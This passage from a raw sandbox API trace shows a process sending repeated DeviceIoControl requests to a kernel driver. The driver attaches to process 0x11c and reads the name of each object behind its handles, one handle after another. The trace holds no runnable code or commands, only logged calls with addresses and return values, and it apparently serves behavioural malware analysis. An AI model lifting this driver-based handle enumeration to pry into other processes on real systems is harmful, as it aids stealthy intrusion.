out: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880052b35d0) [0224.069] ObReferenceObjectByHandle (in: Handle=0x20c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003996980, HandleInformation=0x0) returned 0x0 [0224.069] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.069] PsReleaseProcessExitSynchronization () returned 0x2 [0224.069] ObfDereferenceObject (Object=0xfffffa80038c8b30) returned 0xb1 [0224.069] ObQueryNameString (in: Object=0xfffffa8002821370, ObjectNameInfo=0xfffffa800312f044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa800312f044, ReturnLength=0xfffff880052b3508) returned 0x0 [0224.069] ObfDereferenceObject (Object=0xfffffa8003996980) returned 0x1 [0224.069] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.069] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.069] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.069] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x46, lpOverlapped=0x0) returned 1 [0224.069] PsLookupProcessByProcessId (in: ProcessId=0x11c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.069] PsAcquireProcessExitSynchronization () returned 0x0 [0224.069] KeStackAttachProcess (in: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880052b35d0) [0224.069] ObReferenceObjectByHandle (in: Handle=0x210, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003997d10, HandleInformation=0x0) returned 0x0 [0224.069] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.069] PsReleaseProcessExitSynchronization () returned 0x2 [0224.069] ObfDereferenceObject (Object=0xfffffa80038c8b30) returned 0xb1 [0224.069] ObQueryNameString (in: Object=0xfffffa80037f6060, ObjectNameInfo=0xfffffa8003086044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003086044, ReturnLength=0xfffff880052b3508) returned 0x0 [0224.070] ObfDereferenceObject (Object=0xfffffa8003997d10) returned 0x1 [0224.070] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.070] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.070] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.070] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x3a, lpOverlapped=0x0) returned 1 [0224.070] PsLookupProcessByProcessId (in: ProcessId=0x11c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.070] PsAcquireProcessExitSynchronization () returned 0x0 [0224.070] KeStackAttachProcess (in: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880052b35d0) [0224.070] ObReferenceObjectByHandle (in: Handle=0x21c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80039973e0, HandleInformation=0x0) returned 0x0 [0224.070] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.070] PsReleaseProcessExitSynchronization () returned 0x2 [0224.070] ObfDereferenceObject (Object=0xfffffa80038c8b30) returned 0xb1 [0224.070] ObQueryNameString (in: Object=0xfffffa80039973e0, ObjectNameInfo=0xfffffa8003084044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003084044, ReturnLength=0xfffff880052b3550) returned 0x0 [0224.070] ObfDereferenceObject (Object=0xfffffa80039973e0) returned 0x1 [0224.070] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.070] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.070] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.070] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x3a, lpOverlapped=0x0) returned 1 [0224.070] PsLookupProcessByProcessId (in: ProcessId=0x11c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.070] PsAcquireProcessExitSynchronization () returned 0x0 [0224.070] KeStackAttachProcess (in: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880052b35d0) [0224.070] ObReferenceObjectByHandle (in: Handle=0x228, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003998260, HandleInformation=0x0) returned 0x0 [0224.070] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.070] PsReleaseProcessExitSynchronization () returned 0x2 [0224.070] ObfDereferenceObject (Object=0xfffffa80038c8b30) returned 0xb1 [0224.070] ObQueryNameString (in: Object=0xfffffa8003998260, ObjectNameInfo=0xfffffa8003065044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003065044, ReturnLength=0xfffff880052b3550) returned 0x0 [0224.070] ObfDereferenceObject (Object=0xfffffa8003998260) returned 0x1 [0224.071] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.071] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.071] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.071] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x3a, lpOverlapped=0x0) returned 1 [0224.071] PsLookupProcessByProcessId (in: ProcessId=0x11c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.071] PsAcquireProcessExitSynchronization () returned 0x0 [0224.071] KeStackAttachProcess (in: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880052b35d0) [0224.071] ObReferenceObjectByHandle (in: Handle=0x22c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80039963d0, HandleInformation=0x0) returned 0x0 [0224.071] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.071] PsReleaseProcessExitSynchronization () returned 0x2 [0224.071] ObfDereferenceObject (Object=0xfffffa80038c8b30) returned 0xb1 [0224.071] ObQueryNameString (in: Object=0xfffffa80039963d0, ObjectNameInfo=0xfffffa8003066044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003066044, ReturnLength=0xfffff880052b3550) returned 0x0 [0224.071] ObfDereferenceObject (Object=0xfffffa80039963d0) returned 0x2 [0224.071] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.071] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.071] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.071] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x3a, lpOverlapped=0x0) returned 1 [0224.071] PsLookupProcessByProcessId (in: ProcessId=0x11c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.071] PsAcquireProcessExitSynchronization () returned 0x0 [0224.071] KeStackAttachProcess (in: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880052b35d0) [0224.071] ObReferenceObjectByHandle (in: Handle=0x268, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800399da20, HandleInformation=0x0) returned 0x0 [0224.071] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.071] PsReleaseProcessExitSynchronization () returned 0x2 [0224.072] ObfDereferenceObject (Object=0xfffffa80038c8b30) returned 0xb1 [0224.072] ObQueryNameString (in: Object=0xfffffa800399da20, ObjectNameInfo=0xfffffa8003069044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003069044, ReturnLength=0xfffff880052b3550) returned 0x0 [0224.072] ObfDereferenceObject (Object=0xfffffa800399da20) returned 0x1 [0224.072] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.072] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.072] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.072] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x3a, lpOverlapped=0x0) returned 1 [0224.072] PsLookupProcessByProcessId (in: ProcessId=0x11c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.072] PsAcquireProcessExitSynchronization () returned 0x0 [0224.072] KeStackAttachProcess (in: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880052b35d0) [0224.072] ObReferenceObjectByHandle (in: Handle=0x270, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800399d780, HandleInformation=0x0) returned 0x0 [0224.072] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.072] PsReleaseProcessExitSynchronization () returned 0x2 [0224.072] ObfDereferenceObject (Object=0xfffffa80038c8b30) returned 0xb1 [0224.072] ObQueryNameString (in: Object=0xfffffa800399d780, ObjectNameInfo=0xfffffa8003080044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003080044, ReturnLength=0xfffff880052b3550) returned 0x0 [0224.072] ObfDereferenceObject (Object=0xfffffa800399d780) returned 0x2 [0224.072] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.072] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.072] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.072] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x3a, lpOverlapped=0x0) returned 1 [0224.072] PsLookupProcessByProcessId (in: ProcessId=0x11c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.072] PsAcquireProcessExitSynchronization () returned 0x0 [0224.072] KeStackAttachProcess (in: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880052b35d0) [0224.073] ObReferenceObjectByHandle (in: Handle=0x274, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800399d630, HandleInformation=0x0) returned 0x0 [0224.073] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.073] PsReleaseProcessExitSynchronization () returned 0x2 [0224.073] ObfDereferenceObject (Object=0xfffffa80038c8b30) returned 0xb1 [0224.073] ObQueryNameString (in: Object=0xfffffa800399d630, ObjectNameInfo=0xfffffa800306f044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800306f044, ReturnLength=0xfffff880052b3550) returned 0x0 [0224.073] ObfDereferenceObject (Object=0xfffffa800399d630) returned 0x1 [0224.073] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.073] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.073] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.073] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x54, lpOverlapped=0x0) returned 1 [0224.073] PsLookupProcessByProcessId (in: ProcessId=0x11c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.073] PsAcquireProcessExitSynchronization () returned 0x0 [0224.073] KeStackAttachProcess (in: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880052b35d0) [0224.073] ObReferenceObjectByHandle (in: Handle=0x2d0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000b13910, HandleInformation=0x0) returned 0x0 [0224.073] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.073] PsReleaseProcessExitSynchronization () returned 0x2 [0224.073] ObfDereferenceObject (Object=0xfffffa80038c8b30) returned 0xb1 [0224.073] ObQueryNameString (in: Object=0xfffff8a000b13910, ObjectNameInfo=0xfffffa80019dd044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa80019dd044, ReturnLength=0xfffff880052b3550) returned 0x0 [0224.073] ObfDereferenceObject (Object=0xfffff8a000b13910) returned 0x24 [0224.073] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.073] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.073] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.073] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x54, lpOverlapped=0x0) returned 1 [0224.073] PsLookupProcessByProcessId (in: ProcessId=0x11c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.073] PsAcquireProcessExitSynchronization () returned 0x0 [0224.073] KeStackAttachProcess (in: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880052b35d0) [0224.074] ObReferenceObjectByHandle (in: Handle=0x2d4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000b13910, HandleInformation=0x0) returned 0x0 [0224.074] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.074] PsReleaseProcessExitSynchronization () returned 0x2 [0224.074] ObfDereferenceObject (Object=0xfffffa80038c8b30) returned 0xb1 [0224.074] ObQueryNameString (in: Object=0xfffff8a000b13910, ObjectNameInfo=0xfffffa800306d044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800306d044, ReturnLength=0xfffff880052b3550) returned 0x0 [0224.074] ObfDereferenceObject (Object=0xfffff8a000b13910) returned 0x24 [0224.074] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.074] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.074] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.074] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x34, lpOverlapped=0x0) returned 1 [0224.074] PsLookupProcessByProcessId (in: ProcessId=0x11c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.074] PsAcquireProcessExitSynchronization () returned 0x0 [0224.074] KeStackAttachProcess (in: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880052b35d0) [0224.074] ObReferenceObjectByHandle (in: Handle=0x448, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003a04b90, HandleInformation=0x0) returned 0x0 [0224.074] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.074] PsReleaseProcessExitSynchronization () returned 0x2 [0224.074] ObfDereferenceObject (Object=0xfffffa80038c8b30) returned 0xb1 [0224.074] ObQueryNameString (in: Object=0xfffffa8003a04b90, ObjectNameInfo=0xfffffa800306e044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800306e044, ReturnLength=0xfffff880052b3550) returned 0x0 [0224.074] ObfDereferenceObject (Object=0xfffffa8003a04b90) returned 0x1 [0224.074] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.075] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.075] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.075] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x34, lpOverlapped=0x0) returned 1 [0224.075] PsLookupProcessByProcessId (in: ProcessId=0x11c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.075] PsAcquireProcessExitSynchronization () returned 0x0 [0224.075] KeStackAttachProcess (in: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880052b35d0) [0224.075] ObReferenceObjectByHandle (in: Handle=0x454, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003a07b20, HandleInformation=0x0) returned 0x0 [0224.075] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.075] PsReleaseProcessExitSynchronization () returned 0x2 [0224.075] ObfDereferenceObject (Object=0xfffffa80038c8b30) returned 0xb1 [0224.075] ObQueryNameString (in: Object=0xfffffa8003a07b20, ObjectNameInfo=0xfffffa8003071044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003071044, ReturnLength=0xfffff880052b3550) returned 0x0 [0224.075] ObfDereferenceObject (Object=0xfffffa8003a07b20) returned 0x2 [0224.075] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.075] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.075] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.075] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0224.075] PsLookupProcessByProcessId (in: ProcessId=0x11c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.075] PsAcquireProcessExitSynchronization () returned 0x0 [0224.075] KeStackAttachProcess (in: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880052b35d0) [0224.075] ObReferenceObjectByHandle (in: Handle=0x4a8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80034ed070, HandleInformation=0x0) returned 0x0 [0224.075] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.075] PsReleaseProcessExitSynchronization () returned 0x2 [0224.075] ObfDereferenceObject (Object=0xfffffa80038c8b30) returned 0xb1 [0224.075] ObQueryNameString (in: Object=0xfffffa80026efe40, ObjectNameInfo=0xfffffa8003072044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003072044, ReturnLength=0xfffff880052b3508) returned 0x0 [0224.075] ObfDereferenceObject (Object=0xfffffa80034ed070) returned 0x1 [0224.076] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.076] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.076] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.076] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x3a, lpOverlapped=0x0) returned 1 [0224.076] PsLookupProcessByProcessId (in: ProcessId=0x11c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.076] PsAcquireProcessExitSynchronization () returned 0x0 [0224.076] KeStackAttachProcess (in: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880052b35d0) [0224.076] ObReferenceObjectByHandle (in: Handle=0x4d0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a001170d80, HandleInformation=0x0) returned 0x0 [0224.076] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.076] PsReleaseProcessExitSynchronization () returned 0x2 [0224.076] ObfDereferenceObject (Object=0xfffffa80038c8b30) returned 0xb1 [0224.076] ObQueryNameString (in: Object=0xfffff8a001170d80, ObjectNameInfo=0xfffffa8003073044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003073044, ReturnLength=0xfffff880052b3550) returned 0x0 [0224.076] ObfDereferenceObject (Object=0xfffff8a001170d80) returned 0x8 [0224.076] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.076] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.076] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.076] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8c, lpOverlapped=0x0) returned 1 [0224.076] PsLookupProcessByProcessId (in: ProcessId=0x11c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.077] PsAcquireProcessExitSynchronization () returned 0x0 [0224.077] KeStackAttachProcess (in: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880052b35d0) [0224.077] ObReferenceObjectByHandle (in: Handle=0x558, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800368b100, HandleInformation=0x0) returned 0x0 [0224.077] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.077] PsReleaseProcessExitSynchronization () returned 0x2 [0224.077] ObfDereferenceObject (Object=0xfffffa80038c8b30) returned 0xb1 [0224.077] ObQueryNameString (in: Object=0xfffffa800368b100, ObjectNameInfo=0xfffffa8003076044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003076044, ReturnLength=0xfffff880052b3550) returned 0x0 [0224.077] ObfDereferenceObject (Object=0xfffffa800368b100) returned 0x1 [0224.077] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.077] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.077] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.077] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x3a, lpOverlapped=0x0) returned 1 [0224.077] PsLookupProcessByProcessId (in: ProcessId=0x11c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.077] PsAcquireProcessExitSynchronization () returned 0x0 [0224.077] KeStackAttachProcess (in: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880052b35d0) [0224.077] ObReferenceObjectByHandle (in: Handle=0x570, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003acd3a0, HandleInformation=0x0) returned 0x0 [0224.077] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.077] PsReleaseProcessExitSynchronization () returned 0x2 [0224.077] ObfDereferenceObject (Object=0xfffffa80038c8b30) returned 0xb1 [0224.077] ObQueryNameString (in: Object=0xfffffa8003acd3a0, ObjectNameInfo=0xfffffa8003077044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003077044, ReturnLength=0xfffff880052b3550) returned 0x0 [0224.077] ObfDereferenceObject 